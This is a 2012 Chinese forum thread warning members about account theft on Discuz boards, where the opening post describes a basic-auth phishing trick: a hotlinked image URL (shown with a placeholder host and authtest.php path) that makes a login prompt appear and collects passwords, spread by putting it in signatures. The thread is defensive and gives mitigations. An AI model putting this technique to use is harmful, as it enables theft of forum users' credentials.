打印

[建议] 你的账号为什么会被盗？（有图有真相）

本宮唔壞

☆★☆ 壞壞 ☆★☆

LEVEL 12(精选阶层)

发帖初学者

Rank: 10

尼瑪，說好的性格呢

帖子: 970
精华: 73
积分: 5767
金币: 164881 枚
原创: 199 贴
威望: 309 点
支持: 10754 度
感谢: 46590 度
贡献: 352 值
赞助: 0 次
推广: 0 人
阅读权限: 91
注册时间: 2012-3-13

三级博士 BT區開心王子勋章 BT區免驗證會員 BT原創神手 BT原創人氣銅指環勋章

1楼大中小发表于 2012-12-11 23:33 只看该作者

本贴共获得感谢 X 54

你的账号为什么会被盗？（有图有真相）

盗号漏洞已经公开测试外链图片可以盗号哦！
漏洞详情披露状态：
2012-11-25：细节已通知厂商并且等待厂商处理中
2012-11-30：厂商已经主动忽略漏洞，细节向公众公开
简要描述：利用的是盗号病毒网站的基础认证钓鱼，并成功钓到用户数据
详细说明：当在Discuz中回帖，插入一张很奇葩的图片时，可能就会导致用户被盗号。

复制内容到剪贴板

代码:

01.http://盗号病毒网站/authtest.php?id=Ayuk1y&info=Please+Login+In++@360.cn

例如上面那个地址，可以用图片来引用之，然后回帖，当用户看到这张图片的时候，就会触发提示登陆框。
用户浏览网页就会弹出小窗口如下图所示：

当输入密码后，会重定向到收集数据的页面，接着，你们密码就被盗了。
我为什么认为这个是一个漏洞：

1、用户网站大多都是提醒用户不要再站外输入自己的账号密码，但是，
现在将代码插入到网站内部，用户有认为这是在网站内部，所以就输入了自己的密码。

2、经过试验，成功钓到了用户的数据

3、不仅仅是Discuz，需要网站都支持引用一张网络图片，并没有对图片的HTTP头进行检验。基础认证钓鱼很容易蔓延开来。。

4、之前的钓鱼过程是：黑客设立钓鱼页——通过短信息等传播这个地址——用户访问——用户受骗

而现在是：黑客在帖子中插入钓鱼信息——用户访问——用户受骗
显然，就少了一个非常繁琐的步骤。
例如，在一个论坛中，我将那个图片插在签名中，然后几乎每个帖子都去回复，
然后，用户基本上就是去到哪里都能看到我的框框。。。。然后后果你你懂得。。。。。

解决办法如下：

这个是图片外链漏洞，浏览器向图片来源发出http get请求，如果对方返回http401就会弹出验证框，然后帐号密码返回给对方。所以，千万不要输入自己的用户名和密码否则您的账号将会被盗取，只要关闭外链图片功能或者换成chrome、ff 即可，因为这种手段也就在ie和opera上有效。（解决办法由会员 moluo199010 提供）

附上本宫十级账号差点被盗的真实经历：
thread-4696028-1-1.html

本帖最近评分记录

wangjie365 金币 +3 兄弟有心了。 2012-12-11 23:57

本贴共获得感谢 X 54

TOP

撕扯

★四海集团★AK

LEVEL 10(杰出表现)

发帖资深用户

Rank: 9 Rank: 9 Rank: 9

警察联盟• AK47@溅血总盟

帖子: 7382
精华: 2
积分: 2332
金币: 104132 枚
原创: 11 贴
威望: 40 点
支持: 10001 度
感谢: 4514 度
贡献: 79 值
赞助: 0 次
推广: 0 人
阅读权限: 80
注册时间: 2010-10-10

图区活力会员图区忠实会员色中色拉气勋章图狼荣誉勋章金爱心会员勋章

2楼大中小发表于 2012-12-12 07:32 只看该作者

2012-11-30：厂商已经主动忽略漏洞，细节向公众公开

不知道厂商忽略是处理没有处理！现在盗号太厉害了！防不胜防！让新手如何敢去回帖！敢去发帖！还真希望做出一些能有用的安保措施！

TOP

撕扯

★四海集团★AK

LEVEL 10(杰出表现)

发帖资深用户

Rank: 9 Rank: 9 Rank: 9

警察联盟• AK47@溅血总盟

帖子: 7382
精华: 2
积分: 2332
金币: 104132 枚
原创: 11 贴
威望: 40 点
支持: 10001 度
感谢: 4514 度
贡献: 79 值
赞助: 0 次
推广: 0 人
阅读权限: 80
注册时间: 2010-10-10

图区活力会员图区忠实会员色中色拉气勋章图狼荣誉勋章金爱心会员勋章

3楼大中小发表于 2012-12-12 07:34 只看该作者

在问一句！使用火狐浏览器！广告屏蔽功能应该能防止这个盗号吗？望知道的技术人员回复

TOP

本宮唔壞

☆★☆ 壞壞 ☆★☆

LEVEL 12(精选阶层)

发帖初学者

Rank: 10

尼瑪，說好的性格呢

帖子: 970
精华: 73
积分: 5767
金币: 164881 枚
原创: 199 贴
威望: 309 点
支持: 10754 度
感谢: 46590 度
贡献: 352 值
赞助: 0 次
推广: 0 人
阅读权限: 91
注册时间: 2012-3-13

三级博士 BT區開心王子勋章 BT區免驗證會員 BT原創神手 BT原創人氣銅指環勋章

4楼大中小发表于 2012-12-12 09:26 只看该作者

引用:

原帖由撕扯于 2012-12-12 07:34 发表
在问一句！使用火狐浏览器！广告屏蔽功能应该能防止这个盗号吗？望知道的技术人员回复

这个盗号手法是把盗号病毒的链接用 [img] 代码引用插入在自己的签名图或者帖子图片里，其他用用户只要看到这张图片或者正在浏览有此图片的网页都会触发要求输入用户名和密码的弹窗，而不是您所说的发帖或者回复才会触发弹窗。可想而知这个问题的严重性哦！当输入用户名和密码后，会重定向到收集数据的页面，接着，密码就被盗了。因为代码插入到了网站内部，用户有认为这是在网站内部，所以就轻易的输入了自己的密码。moluo199010 说这个漏洞只会在ie和opera上有效才会有效也许换个浏览器会减少被盗号的几率

TOP

pengqipop

　　　　七喜

LEVEL 8(卓越品质)

发帖资深用户

Rank: 7 Rank: 7 Rank: 7

　　　七喜

帖子: 8089
精华: 2
积分: 416
金币: 9990 枚
原创: 8 贴
威望: 35 点
支持: 19617 度
感谢: 17894 度
贡献: 93 值
赞助: 0 次
推广: 0 人
阅读权限: 60
注册时间: 2010-3-15

三级博士球猜高手色中色拉气勋章 AV区女优达人勋章金爱心会员勋章娱乐达人

5楼大中小发表于 2012-12-12 09:57 只看该作者

还是不要轻易对那些弹窗的输入自己的密码

TOP

本宮唔壞

☆★☆ 壞壞 ☆★☆

LEVEL 12(精选阶层)

发帖初学者

Rank: 10

尼瑪，說好的性格呢

帖子: 970
精华: 73
积分: 5767
金币: 164881 枚
原创: 199 贴
威望: 309 点
支持: 10754 度
感谢: 46590 度
贡献: 352 值
赞助: 0 次
推广: 0 人
阅读权限: 91
注册时间: 2012-3-13

三级博士 BT區開心王子勋章 BT區免驗證會員 BT原創神手 BT原創人氣銅指環勋章

6楼大中小发表于 2012-12-12 10:07 只看该作者

引用:

原帖由 pengqipop 于 2012-12-12 09:57 发表
还是不要轻易对那些弹窗的输入自己的密码

不是轻易不要而是绝对不要
兄弟您还说我电脑本身中毒呢

如果不是本宫机灵
本宫的账号早去发广告了

TOP

多p诱惑

LEVEL 5(良好表现)

发帖学徒

Rank: 4

帖子: 151
精华: 0
积分: 39
金币: 1954 枚
原创: 0 贴
威望: 0 点
支持: 59 度
感谢: 45 度
贡献: 0 值
赞助: 0 次
推广: 0 人
阅读权限: 30
注册时间: 2012-11-26

7楼大中小发表于 2012-12-12 10:13 只看该作者

我不是这种方式被盗的，到目前为止都不知道为什么会被盗！！现在的木马太厉害了

TOP

jyfhmq

SIS家族③★爱心军团

LEVEL 17(脱颖出众)

发帖专家

Rank: 17

流氓集团★魔教教主★

帖子: 28462
精华: 4
积分: 91339
金币: 4482444 枚
原创: 45 贴
威望: 291 点
支持: 2336 度
感谢: 19386 度
贡献: 846 值
赞助: 0 次
推广: 0 人
阅读权限: 98
注册时间: 2009-1-27

SIS家族成员勋章成人区卫士勋章 BT區衛士勛章 SIS茶坊（聊天室）老客茶坊精英勋章色中色十周年紀念章綜合區優良會員勳章探索勇士綜合区影視菁英勳章体竞资源大师竟猜区私庄勋章文区卫士勋章文区贵宾勋章文学评论家勋章色城优秀住民勋章舞文典藏大师勋章爱心天使勋章金爱心会员勋章钻石爱心会员勋章

8楼大中小发表于 2012-12-12 17:33 只看该作者

引用:

原帖由撕扯于 2012-12-12 07:34 发表
在问一句！使用火狐浏览器！广告屏蔽功能应该能防止这个盗号吗？望知道的技术人员回复

我用的就是火狐浏览器，前几天打开那个伪装成《一路向西》下载链接的帖子的时候，也是弹出一个对话框，要求输入用户名和密码，当时我立即关闭了，所以不能确定是否能盗到我的号，但看起来用火狐也不一定保险，被盗号的可能性还是存在的。
总之，各位会员只要注意一点，在论坛中每天只需登录一次即可，论坛肯定不会弹出对话框让你再输入用户名和密码。即使有的贴子所使用的IP地址不同，你打不开，论坛也会只是会提示你没权限浏览这个帖子，而肯定不会出现弹窗。
所以记住一点，遇到弹窗直接关闭，这样最保险！

TOP

成_王败寇

LEVEL 1(未达合格)

发帖新手

帖子: 9
精华: 0
积分: 2
金币: 75 枚
原创: 0 贴
威望: 0 点
支持: 5 度
感谢: 1 度
贡献: 0 值
赞助: 0 次
推广: 0 人
阅读权限: 5
注册时间: 2012-5-3

9楼大中小发表于 2012-12-14 14:51 只看该作者

太恐怖了

我乖乖的听大大们的话，老实点，不贪便宜，绝对不会有事的

我就想问啦，到底论坛上头那些“动人”的广告可以点不拉？？？

有谁能解答解答，谢谢啦...

TOP

XQ

【小Q】退休封号下潜咯。感谢各位 ...

Ban to Post(禁言)

发帖专家

☆★☆㊣2010-2013㊣☆★☆

帖子: 16052
精华: 54
积分: 6714
金币: 54384 枚
原创: 54 贴
威望: 1027 点
支持: 13616 度
感谢: 50374 度
贡献: 1136 值
赞助: 0 次
推广: 0 人
阅读权限: 15
注册时间: 2009-11-11

论坛银级认同勋章 SIS家族成员勋章

10楼 大中小发表于 2012-12-14 15:49 只看该作者

回复 9楼的帖子

可以点

这代码需要设置屏蔽弹出。

TOP

论坛导航 (鼠标移进移出可开关导航)

BT区

热门人气区

文学区

图片鉴赏区

信息区

综合区

其他区

管理团队区

[建议] 你的账号为什么会被盗？（有图有真相）

你的账号为什么会被盗？（有图有真相）

代码:

引用:

引用:

引用:

太恐怖了

回复 9楼的帖子

论坛导航 (鼠标移进移出可开关导航)

BT区

热门人气区

文学区

图片鉴赏区

信息区

综合区

其他区

管理团队区

[建议] 你的账号为什么会被盗？（有图有真相）

你的账号为什么会被盗？（有图有真相）

代码:

引用:

引用:

引用:

太恐怖了

回复 9楼 的帖子

回复 9楼的帖子